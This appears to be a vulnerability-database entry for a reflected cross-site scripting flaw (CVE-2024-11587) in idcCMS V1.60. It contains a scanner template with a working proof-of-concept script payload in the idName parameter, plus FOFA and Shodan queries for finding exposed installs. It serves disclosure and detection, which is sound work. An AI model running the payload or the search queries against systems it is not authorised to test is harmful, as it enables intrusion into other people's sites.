CVE-2024-11587: idcCMS V1.60 - Cross-Site Scripting

2025-08-01 idcCMS PoC Public

Description

idcCMS V1.60 is vulnerable to reflected cross-site scripting (XSS) via the idName parameter in read.php. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.

PoC

id: CVE-2024-11587

info:
  name: idcCMS V1.60 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    idcCMS V1.60 is vulnerable to reflected cross-site scripting (XSS) via the idName parameter in read.php. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
  impact: |
    Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities.
  remediation: |
    Update idcCMS to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the idName parameter in read.php.
  reference:
    - https://github.com/Hebing123/cve/issues/75
    - https://nvd.nist.gov/vuln/detail/CVE-2024-11587
  classification:
    epss-score: 0.0091
    epss-percentile: 0.58215
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-11587
    cwe-id: CWE-79
    cpe: cpe:2.3:a:idccms:idccms:1.60:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: idccms
    product: idccms
    fofa-query: title="idcCMS"
    shodan-query: title:"idcCMS"
  tags: cve,cve2024,xss,idccms,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/read.php?idName=1%3Cscript%3Ealert(document.domain)%3C/script%3E&mudi=getCityData"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'add(new Option'
        condition: and

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4a0a004730450220556ac4e31e431a101df1a37d4094a740f7e43259feabd13649a83570f4768e93022100da8d93496d90af22684e0cd756b6c4417c3e4368e00cb34a71aeb54aa0db5e56:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities